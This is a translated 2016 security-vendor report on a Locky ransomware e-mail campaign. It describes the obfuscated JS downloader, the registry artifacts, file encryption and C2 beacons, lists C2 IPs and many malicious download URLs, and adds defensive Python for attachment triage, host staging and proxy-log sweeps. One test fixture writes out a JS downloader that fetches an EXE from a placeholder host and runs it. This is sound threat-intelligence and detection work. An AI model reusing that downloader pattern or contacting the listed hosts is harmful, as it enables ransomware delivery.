
A Wave of Locky Ransomware Is Coming, Take Cover

 开启美好每一天 2016-03-21

Overview

Since February, 360 Threat Intelligence Center has been tracking a large wave of ransomware. Organisations in China are being hit one after another, and companies' external-facing mailboxes are receiving large volumes of e-mail carrying malicious attachments like the one below.

The e-mail body looks roughly like this:

If an employee carelessly opens the malicious attachment, the malware connects out to a server to download its components, encrypts the important files on the system and demands payment for decryption.

Sample Behaviour Analysis

The e-mail attachment is a zip archive containing nothing but two JS scripts:

The JS is obfuscated. Analysis shows that once the victim double-clicks it, the script creates an MSXML2.XMLHTTP object to download an executable from http:///euwiyr4hdc and then starts the Locky main process through the run method of a WScript.Shell object:

The downloaded EXE is heavily obfuscated:
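The downloader described above gives a mail gateway something concrete to look for without running the script: a zip that contains only script files, and script text that instantiates the WSH download and launch objects. The following is an added example, not code from the 360 report; it performs that static triage on an in-memory archive. The archive, the script body and the placeholder host example.invalid (standing in for the host elided in the report) are all constructed here.

```python
# Added example, not code from the 360 report: static triage of a zip attachment
# of the kind the campaign mailed (an archive holding only .js files), looking
# for the WSH downloader building blocks the report names (MSXML2.XMLHTTP to
# fetch the EXE, WScript.Shell.run to start it). The sample archive and its
# script text are constructed here; example.invalid stands in for the elided host.
import io
import os
import re
import zipfile

SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".vbs", ".vbe"}

# Names a WSH downloader needs. Obfuscators split them across string
# concatenations, so _normalise() rejoins "ab" + "cd" before matching.
INDICATORS = {
    "msxml2_xmlhttp": re.compile(r"MSXML2\.XMLHTTP", re.I),
    "adodb_stream": re.compile(r"ADODB\.Stream", re.I),
    "wscript_shell": re.compile(r"WScript\.Shell", re.I),
    "shell_run": re.compile(r"\.run\s*\(", re.I),
    "url": re.compile(r"https?://", re.I),
}
MAX_SCAN_BYTES = 1_000_000  # never inflate an arbitrarily large member


def _normalise(text: str) -> str:
    """Collapse 'MSX' + 'ML2.XMLHTTP' style concatenations into one literal."""
    return re.sub(r"""(["'])\s*\+\s*\1""", "", text)


def triage_zip_attachment(zip_bytes: bytes) -> dict:
    """Verdict for a zip attachment, derived from member names and content only."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        members = [m for m in zf.infolist() if not m.is_dir()]
        exts = {os.path.splitext(m.filename)[1].lower() for m in members}
        scripts_only = bool(members) and exts <= SCRIPT_EXTENSIONS
        hits = set()
        for m in members:
            if m.file_size > MAX_SCAN_BYTES:
                continue
            text = _normalise(zf.read(m).decode("latin-1"))  # latin-1 never raises
            hits.update(name for name, pat in INDICATORS.items() if pat.search(text))
    if scripts_only and hits:
        verdict = "block"          # script-only archive that contains downloader code
    elif scripts_only or hits:
        verdict = "suspicious"     # one signal only: quarantine for a closer look
    else:
        verdict = "clean"
    return {"members": [m.filename for m in members], "scripts_only": scripts_only,
            "indicators": sorted(hits), "verdict": verdict}


def build_zip(files: dict) -> bytes:
    """Build an in-memory archive from {name: text}; used for the constructed sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, text in files.items():
            zf.writestr(name, text)
    return buf.getvalue()


# Constructed stand-in for the de-obfuscated attachment: fetch an EXE, save it,
# run it. Literals are split the way obfuscators split them.
SAMPLE_JS = (
    'var x = new ActiveXObject("MSX" + "ML2.XMLHTTP");\n'
    'x.open("GET", "http://" + "example.invalid/euwiyr4hdc", false); x.send();\n'
    'var s = new ActiveXObject("ADO" + "DB.Stream"); s.Type = 1; s.Open();\n'
    's.Write(x.responseBody); s.SaveToFile("C:\\\\Users\\\\Public\\\\q.exe", 2);\n'
    'new ActiveXObject("WScr" + "ipt.Shell").run("C:\\\\Users\\\\Public\\\\q.exe");\n'
)
SAMPLE_ATTACHMENT = build_zip({"invoice_J98231.js": SAMPLE_JS,
                               "invoice_J98231 (copy).js": SAMPLE_JS})

if __name__ == "__main__":
    print(triage_zip_attachment(SAMPLE_ATTACHMENT))
```

The rejoining step matters more than the indicator list: a sample that passes the raw-text check will usually fail it once `"WScr" + "ipt.Shell"` is collapsed. Encoded or `eval`-built strings still slip through, which is why a script-only archive is flagged as suspicious even with no indicator hit.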

Once the process starts it writes a machine ID to HKEY_CURRENT_USER\Software\Locky\id and the public key it will use for encryption to HKEY_CURRENT_USER\Software\Locky\pubkey:

The trojan then walks the directory tree looking for files with extensions such as .xls, .ppt, .doc, .wb2, .jpg and .wav, encrypts them with RSA into files named Id+hash.locky, and writes a recovery-instruction document into every directory that held documents:

When encryption finishes it sets HKEY_CURRENT_USER\Software\Locky\completed to 1 and reports to the server with encrypted data:
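The three registry values and the file naming above are enough to tell, during response, whether a host was merely prepared, is still encrypting, or has finished. The following is an added example, not code from the 360 report: it parses a `reg export` of the Locky key and a list of file paths and returns the stage. The export text and the paths are constructed. Two assumptions go beyond the report: that .locky names are 32 hex characters (the report only says id + hash), and that pubkey holds a Microsoft CryptoAPI PUBLICKEYBLOB, which is the layout parsed below; any other encoding is reported as unrecognised.

```python
# Added example, not code from the 360 report: decide what stage an infection
# reached from the artifacts the report lists (HKCU\Software\Locky\{id,pubkey,
# completed} and "<id>+<hash>.locky" file names). Input is the text of
# `reg export HKCU\Software\Locky locky.reg` and a list of file paths, both
# constructed here. Assumptions beyond the report: .locky names are 32 hex
# characters, and pubkey is a CryptoAPI PUBLICKEYBLOB (layout parsed below).
import re

LOCKY_KEY = r"HKEY_CURRENT_USER\Software\Locky"
LOCKY_NAME = re.compile(r"^[0-9A-F]{32}\.locky$", re.I)   # assumption: 16-hex id + 16-hex hash


def parse_reg_export(text: str) -> dict:
    """Minimal .reg parser: {key_path: {value_name: value}}; hex values kept as 'hex:..' strings."""
    keys, current, pending = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:                     # continuation line of a hex value
            pending[1] += line.rstrip("\\")
            if not line.endswith("\\"):
                keys[current][pending[0]] = pending[1]
                pending = None
        elif line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, val = line.partition("=")
            name = name.strip('"')
            if val.startswith("dword:"):
                keys[current][name] = int(val[6:], 16)
            elif val.startswith('"'):
                keys[current][name] = val[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            elif val.endswith("\\"):
                pending = [name, val[:-1]]
            else:
                keys[current][name] = val
    return keys


def describe_pubkey(value) -> dict:
    """Decode pubkey if it is a CryptoAPI PUBLICKEYBLOB:
    06 02 00 00 | 00 a4 00 00 | 'RSA1' | bitlen (LE) | pubexp (LE) | modulus."""
    if not isinstance(value, str) or not value.startswith("hex:"):
        return {"format": "unrecognised"}
    blob = bytes.fromhex(value[4:].replace(",", ""))
    if len(blob) >= 20 and blob[0] == 0x06 and blob[8:12] == b"RSA1":
        return {"format": "cryptoapi_publickeyblob",
                "bits": int.from_bytes(blob[12:16], "little"),
                "exponent": int.from_bytes(blob[16:20], "little")}
    return {"format": "unrecognised", "length": len(blob)}


def classify_host(reg_text: str, file_paths: list) -> dict:
    """Stage of infection from the registry key plus .locky files seen on disk."""
    values = parse_reg_export(reg_text).get(LOCKY_KEY, {})
    victim_id = values.get("id")
    names = [re.split(r"[\\/]", p)[-1] for p in file_paths]
    locky_files = [n for n in names if LOCKY_NAME.match(n)]
    # The report says names are id + hash, so a .locky file that does not start
    # with this host's id was encrypted by another victim (for example over a share).
    foreign = [n for n in locky_files if victim_id and not n.upper().startswith(victim_id.upper())]
    if values.get("completed") == 1:
        stage = "encryption_complete"      # note already shown; restore from backup
    elif values:
        stage = "encryption_in_progress"   # key written, completed != 1: isolate and kill it now
    elif locky_files:
        stage = "locky_files_only"         # no key on this host: the encrypting host is elsewhere
    else:
        stage = "clean"
    return {"stage": stage, "victim_id": victim_id, "encrypted_files": len(locky_files),
            "foreign_id_files": len(foreign), "pubkey": describe_pubkey(values.get("pubkey"))}


# Constructed export; the modulus bytes after the header are shortened.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Locky]
"id"="A1B2C3D4E5F60718"
"pubkey"=hex:06,02,00,00,00,a4,00,00,52,53,41,31,00,08,00,00,01,00,01,00,\
  c3,9a,7e
"completed"=dword:00000001
"""
SAMPLE_FILES = [   # constructed paths
    r"C:\Users\alice\Documents\A1B2C3D4E5F607182B4C6D8E0F1A3B5C.locky",
    r"C:\Users\alice\Documents\recovery_instructions.txt",
    r"C:\Users\alice\Pictures\A1B2C3D4E5F607189F8E7D6C5B4A3F2E.locky",
    r"\\fileserver\share\FFEEDDCCBBAA99887766554433221100.locky",
]

if __name__ == "__main__":
    print(classify_host(SAMPLE_REG, SAMPLE_FILES))
```

The foreign-id count is the detail worth acting on: files on a share whose name prefix is not this host's id point to a second infected machine that still needs to be found.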

A partial list of the communication addresses:

http://78.40.108.39/main.php

http://51.255.107.8/main.php

http://51.255.107.10/main.php

http://51.254.181.122/main.php

http://195.64.154.114/main.php

http://188.127.231.116/main.php

http://149.202.109.205/main.php

Finally it sets the desktop wallpaper to the recovery-instruction image, pops up the recovery-instruction document and waits for the victim to pay the ransom:

Infection Status and Recommendations

According to 360 Threat Intelligence Center data, more than ten thousand users have been confirmed infected since March, and services offering to pay the ransom and decrypt on the victim's behalf have even appeared on Taobao. Users are advised not to open e-mail from unknown sources; 360 Safeguard (360安全卫士) detects and removes this ransomware on an ongoing basis.

IOC

The downloader servers the attackers use to host the malicious code are mostly compromised legitimate sites. A partial list follows; block them on boundary devices.

http://1./engine/core/76tr5rguinml.exe

http://1./modules/images/87yhb54cdfy.exe

http://111.208.4.230:82/1Q2W3E4R5T6Y7U8I9O0P1Z2X3C4V5B//system/logs/76tr5rguinml.exe

http://120.52.72.52//c3pr90ntcsf0/system/logs/76tr5rguinml.exe

http://120.52.72.57//c3pr90ntcsf0/system/logs/4trf3g45.exe

http://178.33.176.229/ber.exe

http://2./img/multigaminator/4trf3g45.exe

http://50.28.211.199/hdd0/89o8i76u5y4

http://51457642.de./980k7j6h5

http:///wp-includes/rest-api/5h45hg4b

http:///4/0vexw3s5

http:///system/logs/086tg7

http:///87yg756f5.exe

http:///system/logs/98yhb764d.exe

http:///wp-content/plugins/87tg7v645c.exe

http:///87yg756f5.exe

http://anro./vqmod/vqcache/4trf3g45.exe

http:///system/logs/87tg7v645c.exe

http:///system/logs/765uy453gt5

http:///87yg756f5.exe

http:///libraries/simplepie/765g473bf34

http:///wp-includes/SimplePie/7ygvtyvb7niim.exe

http:///08o76g445g

http:///system/logs/87tg7v645c.exe

http:///image/templates/7ygvtyvb7niim.exe

http:///system/logs/7t6f65g.exe

http:///system/logs/87yhb54cdfy.exe

http:///89ok8jhg

http:///system/logs/7ygvtyvb7niim.exe

http://biomir./system/logs/78tgh76.exe

http:///system/logs/76tr5rguinml.exe

http:///system/cache/223

http:///system/logs/7t6f65g.exe

http://c001456.aaa./system/logs/87yg756f5.exe

http://casewerkz./system/logs/87yhb54cdfy.exe

http:///system/logs/uy78hn654e.exe

http://ccac3323.com./0y7bf3r

http:///system/logs/uy78hn654e.exe

http:///system/logs/uy78hn654e.exe

http:///system/logs/lkj87h.exe

http:///system/logs/76tr5rguinml.exe

http:///87yg756f5.exe

http:///wp-content/uploads/5h45hg4b

http:///system/logs/lkj87h.exe

http://cyberbuh./97kh65gh5

http://demo./87yg756f5.exe

http://demo./system/logs/87yhb54cdfy.exe

http://demo2./modules/payments/76tr5rguinml.exe

http://demo2./plugins/markitup/4trf3g45.exe

http:///system/logs/98yhb764d.exe

http:///system/logs/uy78hn654e.exe

http:///system/logs/76h5gf43wg54

http://donutes./system/logs/87yhb54cdfy.exe

http:///system/logs/uy78hn654e.exe

http:///system/logs/87tg7v645c.exe

http:///js/playstation4.exe

http://eiadmeodeda./8fjvimkel1/c987ah8j9ei1.php

http://e-journal./8y74hfb

http:///wp-content/themes/765g473bf34

http:///wp-admin/network/87hg8n54

http:///admin/model/87yhb54cdfy.exe

http://escortbayan./wp-content/plugins/hello123/89h8btyfde445.exe

http:///763fdvf

http://fashion-girl./catalog/controller/87hg8n54

http://fb7707vd./admin/language/4trf3g45.exe

http:///system/logs/87tg7v645c.exe

http://fkaouane./67uh54gb4

http:///87yg756f5.exe

http:///system/logs/87yhb54cdfy.exe

http:///system/logs/7t6f65g.exe

http://g200./system/logs/87yhb54cdfy.exe

http:///32tguynjk

http:///87yg756f5.exe

http:///69.exe

http:///80.exe

http:///69.exe

http:///80.exe

http://gladilki./system/library/a.exe

http:///87yg756f5.exe

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/98yhb764d.exe

http:///69.exe

http:///80.exe

http:///099oj6hg

http:///27h8n

http:///system/logs/76tr5rguinml.exe

http://hkhc-shop./system/logs/87yg7g

http:///69.exe

http:///87yg756f5.exe

http:///system/logs/87jhg44g5

http:///69.exe

http:///80.exe

http:///80.exe

http:///system/logs/76tr5rguinml.exe

http:///system/logs/uy78hn654e.exe

http:///system/logs/4trf3g45.exe

http:///system/logs/76tr5rguinml.exe

http:///system/logs/98yhb764d.exe

http:///system/logs/7t6f65g.exe

http:///9uj8n76b5.exe

http://jewellery./system/logs/iu8y7g6b

http:///system/logs/87tg7v645c.exe

http:///69.exe

http:///80.exe

http:///76t2gr345

http://kiddyshop./image/data/87tg7v645c.exe

http:///7r5fyf6

http://kievelectric./art/media/87tg7v645c.exe

http:///87yg756f5.exe

http://kokoko./54g4

http:///system/logs/76tr5rguinml.exe

http://lahmar.choukri.perso./78hg4wg

http:///system/logs/78tgh76.exe

http:///system/logs/uy78hn654e.exe

http:///admin/controller/87yhb54cdfy.exe

http:///9uj8n76b5.exe

http:///system/logs/87tg7v645c.exe

http://liquor1./system/logs/7ygvtyvb7niim.exe

http:///wp-admin/js/765g473bf34

http:///system/logs/98yhb764d.exe

http:///adminka/templ/7ygvtyvb7niim.exe

http://mansolution./system/logs/7ygvtyvb7niim.exe

http:///978yhen2

http://maxbeauty./administrator/manifests/765g473bf34

http:///system/cache/111

http:///system/logs/uy78hn654e.exe

http:///o097jhg4g5

http:///system/logs/98yhb764d.exe

http:///system/logs/43d5f67n8

http:///system/logs/87yhb54cdfy.exe

http://nagrobkipelplin./modules/mod_wrapper/4trf3g45.exe

http:///system/logs/7t6f65g.exe

http:///87yg756f5.exe

http:///system/logs/987i6u5y4t

http:///system/logs/uy78hn654e.exe

http:///0954t4h45

http:///23r35y44y5

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/23f3rf33.exe

http://ohbelleza./system/logs/87yhb54cdfy.exe

http:///69.exe

http:///80.exe

http:///70.exe

http:///70.exe

http:///85.exe

http:///system/logs/uy78hn654e.exe

http:///k7j6h5gf

http:///3/67t54cetvy

http://parturiencies3f9./76t2gr345

http://perfumy_alice.republika.pl/08h867g5

http:///87745g

http:///98h8n23r23

http:///system/logs/98yg7b

http:///system/logs/q32r45g54

http:///image/cache/7ygvtyvb7niim.exe

http:///system/logs/87tg7v645c.exe

http:///~pugmahons/56er5f6g7b

http://realvacantcolony./97adguwod/08h13rfi982y.php

http://regentsanctionbisexual./97adguwod/08h13rfi982y.php

http:///system/logs/lkj87h.exe

http:///wp-includes/theme-compat/765g473bf34

http:///2/87yv5cds

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/43ghy8n

http:///wp-content/plugins/hello123/89h8btyfde445.exe

http:///system/logs/76tr5rguinml.exe

http://sales-teleselling./wp-includes/fonts/5h45hg4b

http:///67j5h5h4

http:///published/PD/87tg7v645c.exe

http:///system/logs/87tg7v645c.exe

http:///system/logs/76tr5rguinml.exe

http://shofukai.web./23rt54y56

http://shop./system/cache/111

http://shopphpmvc./system/logs/lkj87h.exe

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/78tgh76.exe

http:///5/92buyv5

http:///vqmod/xml/76tr5rguinml.exe

http:///i876jh556h

http:///786u5h

http:///wp-admin/includes/i75rg456

http:///system/logs/4trf3g45.exe

http:///73tgbf334

http:///system/logs/uy78hn654e.exe

http:///system/logs/78tgh76.exe

http://srv35613./storage/plugins/76tr5rguinml.exe

http:///43dfg7hy

http:///system/logs/uy78hn654e.exe

http://stopmeagency./9uj8n76b5.exe

http:///78jh5h

http://store./system/logs/78tgh76.exe

http://sub4./system/logs/87tg7v645c.exe

http:///wp-content/plugins/hello123/89h8btyfde445.exe

http:///system/logs/76tr5rguinml.exe

http://surfcash./0o9k7jh55

http:///system/logs/98yt

http:///system/logs/87tg7v645c.exe

http:///admin/images/7ygvtyvb7niim.exe

http:///67j5hg

http:///system/logs/56y4g45gh45h

http:///vqmod/install/7ygvtyvb7niim.exe

http://test./sdideep/87hg8n54

http:///system/logs/87tg7v645c.exe

http:///bestylethai.com/43t3gh4

http:///45tg

http:///system/logs/4trf3g45.exe

http:///system/logs/98yhb764d.exe

http:///system/logs/7ygvtyvb7niim.exe

http:///69.exe

http:///80.exe

http:///system/logs/4trf3g45.exe

http:///vqmod/xml/87yhb54cdfy.exe

http:///system/logs/87yhb54cdfy.exe

http:///system/cache/.../1.exe

http:///43f

http://tradesolutions./8i76

http:///8i67uy4g

http:///v4v5g45hg.exe

http:///image/cache/87yhb54cdfy.exe

http:///system/logs/lkj87h.exe

http:///v4v5g45hg.exe

http://u1847./system/smsgate/7ygvtyvb7niim.exe

http://ubermensch./system/logs/87yhb54cdfy.exe

http:///system/logs/uy78hn654e.exe

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http://vfwuc./wp-content/uploads/5h45hg4b

http://vgp3./6/98yh8bb

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///69.exe

http:///80.exe

http://webmail./v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///system/cache/111

http://workplace-communication./wp-includes/pomo/5h45hg4b

http://www./98o7kj56h

http://www./wp-includes/y78hiuok

http://www./wp-content/uploads/y78hiuok

http://www./system/logs/4trf3g45.exe

http://www./files/Fedex/fedex.exe

http://www./09y8j

http://www./templates/atomic/js/111.exe

http://www./files/sample.exe

http://www./98o7kj56h

http://www./9oi654gh3

http://www./9oi654gh3

http://www./873y4g7bf3

http://www./files/10003c.exe

http://www./7643grb

http://www./8y7hybigv

http://www./8y7hybigv

http://www./parallax/piatti/promt.exe

http://www./8i5ju4g34

http://www./8i5ju4g34

http://www./087hg67

http://www./4ggh45yh45

http://www.:20480/4ggh45yh45

http://www./4ggh45yh45

http://www./0k6j6n4h4

http://www./0k6j6n4h4

http://www./system/logs/7ygvtyvb7niim.exe

http://www./system/logs/87tg7v645c.exe

http://www./k8j5h

http://www./system/logs/87tg7v645c.exe

http://www./system/logs/78tgh76.exe

http://www./system/cache/87yhb54cdfy.exe

http://www./0l9k7j6

http://www./wp-content/plugins/hello123/89h8btyfde445.exe

http://www./9oi86j5hg4

http://xn--80ahetikodul.xn--p1ai/system/logs/4trf3g45.exe

http://xn--b1afonddk2l.xn--p1ai/system/logs/7t6f65g.exe

http:///system/logs/uy78hn654e.exe

http://zarabotoknasayte.zz.mu/7/sh87hg5v4
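Blocking the hosts above is only half the job; the same list also shows what to sweep proxy logs for, because the payload file names (76tr5rguinml.exe, 4trf3g45.exe, 87yhb54cdfy.exe and so on) and the directories they sit in (/system/logs/, /system/cache/, /wp-content/plugins/hello123/) recur across otherwise unrelated sites, and the C2 addresses listed in the behaviour section all share the /main.php path. The following is an added example, not code from the 360 report, that matches log lines against both the C2 list and the downloader list. The log lines and their "time client method url status bytes" format are constructed; hosts ending in .invalid are placeholders.

```python
# Added example, not code from the 360 report: sweep a web-proxy log for the C2
# beacons listed in the behaviour section (/main.php on the listed IPs) and for
# fetches of the downloader payloads in the IOC list, matched by the payload
# file names that recur across compromised sites and by the directories they
# sit in. Log lines and the "time client method url status bytes" format are
# constructed here; hosts ending in .invalid are placeholders.
import re
from urllib.parse import urlsplit

# C2 addresses from the report's communication list.
C2_IPS = {"78.40.108.39", "51.255.107.8", "51.255.107.10", "51.254.181.122",
          "195.64.154.114", "188.127.231.116", "149.202.109.205"}
# Payload names taken from the IOC list; the same names recur on many hosts.
PAYLOAD_NAMES = {"76tr5rguinml.exe", "87yhb54cdfy.exe", "4trf3g45.exe", "7ygvtyvb7niim.exe",
                 "uy78hn654e.exe", "87tg7v645c.exe", "87yg756f5.exe", "98yhb764d.exe",
                 "7t6f65g.exe", "lkj87h.exe", "78tgh76.exe", "9uj8n76b5.exe", "v4v5g45hg.exe",
                 "89h8btyfde445.exe", "5h45hg4b", "765g473bf34", "87hg8n54"}
# Directories the list shows repeatedly, with an .exe directly below them.
PAYLOAD_DIRS = re.compile(
    r"/(system/logs|system/cache|wp-content/plugins/hello123|vqmod/xml)/[^/]+\.exe$", re.I)


def classify_url(method: str, url: str):
    """Return the IOC category a request falls into, or None."""
    u = urlsplit(url)
    host, path = (u.hostname or "").lower(), u.path
    if host in C2_IPS and path == "/main.php":
        return "c2_beacon"
    if path.rsplit("/", 1)[-1].lower() in PAYLOAD_NAMES:
        return "payload_name"
    if PAYLOAD_DIRS.search(path):
        return "payload_dir"
    return None


def scan_proxy_log(lines) -> list:
    """One hit record per log line that matches an IOC; malformed lines are skipped."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, client, method, url, status, size = parts
        reason = classify_url(method, url)
        if reason:
            hits.append({"time": ts, "client": client, "method": method, "url": url,
                         "status": int(status), "reason": reason})
    return hits


def summarise_clients(lines) -> dict:
    """Per client: which IOC categories were seen and what to do about it."""
    per = {}
    for h in scan_proxy_log(lines):
        d = per.setdefault(h["client"], {"reasons": set(), "delivered": False})
        d["reasons"].add(h["reason"])
        if h["reason"] != "c2_beacon" and 200 <= h["status"] < 300:
            d["delivered"] = True
    for d in per.values():
        if "c2_beacon" in d["reasons"]:
            d["verdict"] = "infected"            # it talked to the C2: isolate and triage the host
        elif d["delivered"]:
            d["verdict"] = "payload_delivered"   # EXE reached the client; assume it ran
        else:
            d["verdict"] = "download_attempted"  # blocked or 404: still find and pull the e-mail
        d["reasons"] = sorted(d["reasons"])
    return per


# Constructed log lines: time client method url status bytes
SAMPLE_LOG = [
    "2016-03-14T09:12:03Z 10.1.2.34 GET http://example-shop.invalid/system/logs/76tr5rguinml.exe 200 184320",
    "2016-03-14T09:12:07Z 10.1.2.34 POST http://78.40.108.39/main.php 200 512",
    "2016-03-14T09:12:09Z 10.1.2.34 POST http://51.255.107.8/main.php 200 512",
    "2016-03-14T09:30:11Z 10.1.2.57 GET http://www.example.invalid/index.html 200 9000",
    "2016-03-14T09:31:44Z 10.1.2.99 GET http://example-blog.invalid/wp-content/plugins/hello123/89h8btyfde445.exe 404 0",
    "2016-03-14T09:40:02Z 10.1.2.101 GET http://example-store.invalid/system/logs/abcdef12.exe 200 180224",
]

if __name__ == "__main__":
    for client, summary in summarise_clients(SAMPLE_LOG).items():
        print(client, summary)
```

Matching on the payload file name catches hosts the IOC list does not name, since the campaign reused the same names on every compromised site; the directory rule catches renamed payloads on the same kind of site at the cost of some false positives, so it is ranked below the exact-name match.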

This article was originally published by 360安全播报 (360 Security Broadcast); when reprinting, please credit the source and this URL. Article URL: http://bobao.360.cn/learning/detail/2804.html
